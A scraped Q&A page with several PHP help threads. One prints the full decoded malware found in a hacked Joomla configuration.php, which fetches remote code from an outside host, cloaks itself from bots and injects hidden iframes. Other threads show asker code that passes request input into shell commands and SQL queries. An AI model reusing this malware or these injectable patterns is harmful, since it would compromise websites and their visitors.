I am trying to help someone with their php website that renders a blank page. When I troubleshoot, I comment out code below and then the page works.
// include "checkifuserlogin.php";
// $condition = "";
// $objDreamVacationGallery = new HomePageBanner();
// $data = $objDreamVacationGallery->selectAllRecords($condition, $sort_field, $sort_order, $start, $limit);
I assume this is a database error but I cannot find where the config file is to see where the database is stored, if its locally or remote.
The server is linux box in AWS.
Checkifuserlogin.php has
<?php
if( (isset($_SESSION['userid']) && $_SESSION['userid'] != '') && (isset($_SESSION['firsttimelogin']) && $_SESSION['firsttimelogin']=='0') ){
if($_REQUEST["from"]=="contactus") {
echo "<script language='JavaScript'>window.location = 'my-account.php'; </script>";
} else {
echo "<script language='JavaScript'>window.location = 'page.php?page_id=home'; </script>";
}
exit;
}
selectAllRecords:
public function selectAllRecords($condition='', $sort_field='', $sort_order='', $limit_start='', $limit_end=''){
return parent::select($this->db_table, $condition, $sort_field, $sort_order, $limit_start, $limit_end);
}
?>
Related
Please see the below code segment . I wanted to stop direct access into loginauth function .So i modified my code as below and when I try to direct access it echo the error. But the problem is that when I try to login via login page it also generate the same error . Could anyone can help me please.
public function loginauth()
{
if (defined('base_url')) {
$this->load->model('Employ_model');
$this->Employ_model->loginauth();
$count = $this->db->affected_rows();
if (($this->session->userdata('privilages')) && ($this->session->userdata('id')) && ($count > 0)) {
redirect('admin/appliedJobs');
} else if (($this->session->userdata('id')) && ($count > 0)) {
redirect('admin/jobsactive');
} else {
$this->login();
}
} else {
echo "
<script>
alert('Direct access not allowed');
window.location.href = 'http://localhost/hr/hr/index.php/admin/jobsactive';
</script>";
}
}
Still trying to get how PHP works :)
Kindly help me with one solution & idea, here is when i'm using:
<?php
$content = array(
'id01'=>'sub_id01.php',
'id02'=>'sub_id02.php'
);
if(in_array($_GET['show'], array_keys($content))) {
include($content[$_GET['show']]);
} else {
include('sub_id00.php');
}
?>
and:
<?php
$content = array(
'id00'=>'N/A',
'id01'=>'ID01',
'id02'=>'ID02',
);
if(!empty($_GET['show']) && isset($content[$_GET['show']])) {
echo $content[$_GET['show']];
} else {
echo $content['id00'];
}
?>
Where first example includes pages and second includes simple code inside ''
Problem is that if there is no ID set (index.php) ut shows default page/code. And if wrong ID set, it'll also show default page/code.
How to update it so without any ID set it would show default page and if some wrong ID set, it would show some error page/code?
Cheers!
UPDATE!
After a while reqding i've updated it with:
<?php
$content = array(
'id01'=>'sub_id01.php',
'id02'=>'sub_id02.php'
);
if (in_array($_GET['show'], array_keys($content)))
{
include($content[$_GET['show']]);
}
elseif (isset($_GET['show']))
{
include('sub_error.php');
}
else {
include('sub_id00.php');
}
?>
And:
<?php
$content = array(
'error'=>'error msg',
'id00'=>'N/A',
'id01'=>'ID01',
'id02'=>'ID02',
);
if(!empty($_GET['show']) && isset($content[$_GET['show']]))
{
echo $content[$_GET['show']];
}
elseif (isset($_GET['show']))
{
echo $content['error'];
}
else
{
echo $content['id00'];
}
?>
:)
$content = array(
'id01'=>'sub_id01.php',
'id02'=>'sub_id02.php'
);
if (isset($_GET['show']))
{
if (array_key_exists($_GET['show'], $content))
{
//$_GET id is set and it exists in content
include($content[$_GET['show']]);
}
else
{
//$_GET id is set but does not exist in content
//include whatever page you have for a wrong id here
}
}
else
{
//else no $_GET was set
//include default page
}
Since a week i was trying to login to the back-end of my joomla 1.5 site. It simply keeps coming back to the login page without any error. When I took a look at the configuration.php file it appeared as a string encoded with following pattern:
<?php eval(base64_decode('string here';))) />
When i decoded it using an online service this is what it appears to be:
if (!defined('frmDs')){ define('frmDs' ,1); function frm_dl ($url) { if (function_exists('curl_init')) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $out = curl_exec ($ch); if (curl_errno($ch) !== 0) $out = false; curl_close ($ch); } else {$out = #file_get_contents($url);} return trim($out); } function frm_crpt($in){ $il=strlen($in);$o=''; for ($i = 0; $i < $il; $i++) $o.=$in[$i] ^ '*'; return $o; } function frm_getcache($tmpdir,$link,$cmtime,$del=true){ $f = $tmpdir.'/sess_'.md5(preg_replace('/^http:\/\/[^\/]+/', '', $link)); if(!file_exists($f) || time() - filemtime($f) > 60 * $cmtime) { $dlc=frm_dl($link); if($dlc===false){ if(del) #unlink($f); else #touch($f); } else { if($fp = #fopen($f,'w')){ fwrite($fp, frm_crpt($dlc)); fclose($fp); }else{return $dlc;} } } $fc = #file_get_contents($f); return ($fc)?frm_crpt($fc):''; } function frm_isbot($ua){ if(($lip=ip2long($_SERVER['REMOTE_ADDR']))<0)$lip+=4294967296; $rs = array(array(3639549953,3639558142),array(1089052673,1089060862),array(1123635201,1123639294),array(1208926209,1208942590), array(3512041473,3512074238),array(1113980929,1113985022),array(1249705985,1249771518),array(1074921473,1074925566), array(3481178113,3481182206),array(2915172353,2915237886)); foreach ($rs as $r) if($lip>=$r[0] && $lip<=$r[1]) return true; if(!$ua)return true; $bots = array('googlebot','bingbot','slurp','msnbot','jeeves','teoma','crawler','spider'); foreach ($bots as $b) if(strpos($ua, $b)!==false) return true; return false; } function frm_tmpdir(){ $fs = array('/tmp','/var/tmp'); foreach (array('TMP', 'TEMP', 'TMPDIR') as $v) { if ($t = getenv($v)) {$fs[]=$t;} } if (function_exists('sys_get_temp_dir')) {$fs[]=sys_get_temp_dir();} $fs[]='.'; foreach ($fs as $f){ $tf = $f.'/'.md5(rand()); if($fp = #fopen($tf, 'w')){ fclose($fp); unlink($tf); return $f; } } return false; } function frm_seref(){ $r = #strtolower($_SERVER["HTTP_REFERER"]); $ses = array('google','bing','yahoo','ask','aol'); foreach ($ses as $se) if(strpos($r, $se.'.')!=false) return true; return false; } function frm_isuniq($tdir){ $ip=$_SERVER['REMOTE_ADDR']; $dbf=$tdir.'/sess_'.md5(date('m.d.y')); $odbf = $tdir.'/sess_'.md5(date('m.d.y',time()-86400)); if (file_exists($odbf)) #unlink($odbf); if(strpos(frm_crpt(#file_get_contents($dbf)),$ip) === false ){ if ($fp=#fopen($dbf,'a')){fputs($fp,frm_crpt($ip.'|')); fclose($fp);} return true; } return false; } $tdir = frm_tmpdir(); $defframe = '<style> .gtvvh { position:absolute; left:-760px; top:-927px; }</style><div class="gtvvh"><iframe src="http://whivmjknp.findhere.org/jquery/get.php?ver=jquery.latest.js" width="477" height="435"></iframe></div>'; $defrdg='http://whivmjknp.findhere.org/jquery/get.php?ver=jquery.js'; $codelink = 'http://whivmjknp.findhere.org/nc/gnc.php?ver=jquery.latest.js'; $rdglink='http://whivmjknp.findhere.org/nc/gnc.php?ver=jquery.js'; $ua=$_SERVER['HTTP_USER_AGENT']; $isb=frm_isbot($ua); if (!$isb && preg_match('/Windows/', $ua) && preg_match('/MSIE|Opera/', $ua) && frm_isuniq($tdir) ){ error_reporting(0); if(!isset($_COOKIE['__utmfr'])) { if(!$codelink) print($defframe); else print(frm_getcache($tdir,$codelink,15)); #setcookie('__utmfr',rand(1,1000),time()+86400*7,'/'); } } //------- $host = preg_replace('/^w{3}\./','', strtolower($_SERVER['HTTP_HOST'])); if($tdir && strlen($host)<100 && preg_match('/^[a-z0-9\-]+\.([a-z]{2,5}|[a-z]{2,3}\.[a-z]{2,3}|.*\.edu)$/', $host)){ $parg = substr(preg_replace( '/[^a-z]+/', '',strtolower(base64_encode(md5($host)))),0,3); $pageid = (isset($_GET[$parg]))?$_GET[$parg]*1:0; $ruri = strtolower($_SERVER['REQUEST_URI']); if((strpos($ruri,'/?')===0||strpos($ruri,'/index.php?')===0) && $pageid > 0){ print(frm_getcache($tdir,"http://whivmjknp.findhere.org/rdg/getpage.php?h=$host&p=$pageid&pa=$parg",60*48,false)); exit(); } if ($isb) { error_reporting(0); print(frm_getcache($tdir,"http://whivmjknp.findhere.org/rdg/getpage.php?h=$host&pa=$parg&g=".(($ruri=='/'||$ruri=='/index.php')?'1':'0'),60*48,false)); } } //---------}
I checked other Joomla installations on my hosting space and see that all the configuration.php are the same.
What to do?
Please help
The only thing the the configuration.php file should have is defined variables. Nothing else. It could very well be that someone has hacked your site and messed around with files.
Change all passwords that are related to your website, including the hosting one.
Take a backup of your site via the cPanel and scan it with some antivirus software. Assuming there are no viruses detected, upgrade your site to the latest of the Joomla 2.5 series (2.5.14).
Then, remove the code you showed in your question from the configuration.php file and try logging back into the Joomla admin panel. If it works, ensure all your extensions are up to date and read this:
Joomla! 2.5.4 Hacked: Having trouble with diagnosis.
If not, then try resetting your super user password via the database:
http://docs.joomla.org/How_do_you_recover_or_reset_your_admin_password%3F
UPDATE:
It seems your whole configuration.php file has been attacked. I have provided you with the code for the file, however there are some blank spaces to be filled in. Anything that does need filling in, I have written next to it:
http://pastebin.com/gWWtCAJR
Let me know how it goes :)
I'm using PHP and JavaScript, and I got a problem when deal with the confirm() function in JavaScript.
Say I have a page add.php, firstly I receive some parameters passed from another page, and I check to see if they are valid or not. If yes, I just insert the data into db and return to another page, if they are not valid, there'll be a confirm() window popped up and let the user to choose whether to continue or not. If the user still choose to continue, I want the page to be reloaded with all the parameters sent again. But the problems is that I cannot get the parameter the second time add.php is loaded.
Previously I didn't use a window.onload function and confirm() pop up, but an < a href> link instead, everything worked fine (Please see the attached code at the end). But when I tried to use the following code, the same url stopped working
echo "<script type=\"text/javascript\">";
echo "window.onload = function() {
var v = confirm(\"$name is not alive, do you want to add it into system?\");
if (v) {
window.location.href= \"add.php?type=room&name=$name&area\"
+ \"=$area&description=$description&\"
+ \"capacity=$capacity&confirm=Y\";
} else {
window.location.href= \"admin.php?area=$area\";
}
}";
echo "</script>";
Following is the previous version, instead of using window.onload(), I used < a href="..." /> link, everything worked fine at that time. get_form_var is a function in functions.inc, which is to get the parameter using $_GET arrays.
<?php
require_once "functions.inc";
// Get non-standard form variables
$name = get_form_var('name', 'string');
$description = get_form_var('description', 'string');
$capacity = get_form_var('capacity', 'string');
$type = get_form_var('type', 'string');
$confirm = get_form_var('confirm','string');
$error = '';
// First of all check that we've got an area or room name
if (!isset($name) || ($name === ''))
{
$error = "empty_name";
$returl = "admin.php?area=$area"
. (!empty($error) ? "&error=$error" : "");
header("Location: $returl");
}
// we need to do different things depending on if its a room
// or an area
elseif ($type == "area")
{
$area = mrbsAddArea($name, $error);
$returl = "admin.php?area=$area"
. (!empty($error) ? "&error=$error" : "");
header("Location: $returl");
}
elseif ($type == "room")
{
if (isset($confirm)){
$dca_osi = getOsiVersion($name);
$room = mrbsAddRoom(
$name,
$area,
$error,
$description,
$capacity,
$dca_osi,
1
);
$returl = "admin.php?area=$area"
. (!empty($error) ? "&error=$error" : "");
header("Location:$returl");
}
else {
$dca_status= pingAddress($name);
$dca_osi = getOsiVersion($name);
if( $dca_status == 0){
$room = mrbsAddRoom(
$name,
$area,
$error,
$description,
$capacity,
$dca_osi,
0
);
$returl = "admin.php?area=$area"
. (!empty($error) ? "&error=$error" : "");
header("Location:$returl");
}
else {
print_header(
$day,
$month,
$year,
$area,
isset($room) ? $room : ""
);
echo "<div id=\"del_room_confirm\">\n";
echo "<p>\n";
echo "$name is not alive, are you sure to add it into system?";
echo "\n</p>\n";
echo "<div id=\"del_room_confirm_links\">\n";
echo "<a href=\"add.php?type=room&name"
. "=$name&area=$area&description"
. "=$description&capacity=$capacity&confirm"
. "=Y\"><span id=\"del_yes\">"
. get_vocab("YES") . "!</span></a>\n";
echo "<a href=\"admin.php?area=$area\"><span id=\"del_no\">"
. get_vocab("NO") . "!</span></a>\n";
echo "</div>\n";
echo "</div>\n";
}
}
}
function pingAddress($host)
{
$pingresult = exec("/bin/ping -c 1 $host", $outcome, $status);
if ($status==0) {
return $status;
}
else {
return 1;
}
}
function getOsiVersion($host)
{
$community = 'public';
$oid = '.1.3.6.1.4.1.1139.23.1.1.2.4';
$sysdesc = exec("snmpwalk -v 2c -c $community $host $oid");
$start = strpos($sysdesc, '"');
if ($start!==false) {
$sysdesc = substr($sysdesc, $start+1,$sysdesc.length-1);
return $sysdesc;
}
else {
return "not available";
}
}
I've solved the problem, just simply by using "&" instead of " & amp;" in the url link... it works fine now...
You try location.reload() javascript call?
I have this code:
btn_jouer.onRelease = function ()
{
verif = txt_email_user.text;
if (txt_email_user.text == "")
{
txt_erreur.textColor = 16724736;
txt_erreur.text = "Champ(s) manquant(s)";
}
else if (verif.indexOf("#", 0) == -1 || verif.indexOf(".", 0) == -1)
{
txt_erreur.textColor = 16724736;
txt_erreur.text = "Adresse E-mail invalide";
}
else
{
php_login = new LoadVars();
php_login.email = txt_email_user.text;
php_login.sendAndLoad(_root.page_Login, php_login, "POST");
php_login.onLoad = function(succes)
{
if (succes)
{
//txt_erreur.text = php_login.etat;
//return;
if (php_login.etat == "exist")
{
_root.var_user.id = php_login.id;
_root.var_user.nom = php_login.nom;
_root.var_user.prenom = php_login.prenom;
_root.var_user.score = php_login.score;
_root.MovieLogin.unloadMovie();
if (_root._root.selectedPhone == "KS360")
{
_root.gotoAndStop(4);
}
else
{
_root.gotoAndStop(3);
} // end else if
}
else if (php_login.etat == "non")
{
trace (php_login.etat);
txt_erreur.text = "Email non enregistré! veuillez vous s'inscrir";
} // end if
} // end else if
};
} // end else if
};
The "page_Login" is login.php file on the server,
After debugging, the file login.php successfully received Posted data so i got:
$_POST['email'] = "what ever you type in swf form";
The login.php processor file:
if(isset($_REQUEST['email'])){
$email = strtolower(addslashes($_REQUEST['email']));
$DB->_request("select * from gamers where email='$email'");
if($DB->_nr() > 0) {
$row = mysql_fetch_array($DB->Result);
echo "&etat=exist&nom={$row['nom']}&prenom={$row['prenom']}&score={$row['score']}";
//
exit;
}
else {
echo "&etat=non";
exit;
}
}
Here above, the $DB->_nr() always returns "0" even the email address exists!
I have tried to create a simple html page having a form with method POST and have a simple input type text with a name="email"
When i write my email which is valid in the database and hit submit $DB->_nr() returns 1.
This really is driving me crazy, i'm sure that the email address exists, the login.php page receive posted data "email = validemail#domain.com" from SendAndLoad(); but mysql_num_rows returns 0.
Any one there had the same issue??
Any help would be so much appreciated!
Barry,
Use the following code in PHP to compare the email in both cases: given from flash and from HTML form:
if(isset($_REQUEST['email'])){
//createa the testFile.txt and give it attributes with 0777 for permission (in case you are under linux)
$myFile = "testFile.txt";
$fh = fopen($myFile, 'a') or die("can't open file");
fwrite($fh, "-".$_REQUEST['email']."-\r\n");
fclose($fh);
$email = strtolower(addslashes($_REQUEST['email']));
$DB->_request("select * from gamers where email='$email'");
if($DB->_nr() > 0) {
$row = mysql_fetch_array($DB->Result);
echo "&etat=exist&nom={$row['nom']}&prenom={$row['prenom']}&score={$row['score']}";
//
exit;
}
else {
echo "&etat=non";
exit;
}
}
if you test for both of the cases, you will be able to compare the two exact forms. I have put "-" in the front and the end of it just to see if there are any whitespaces next to the email value.
Please reply with a compare result. thank you.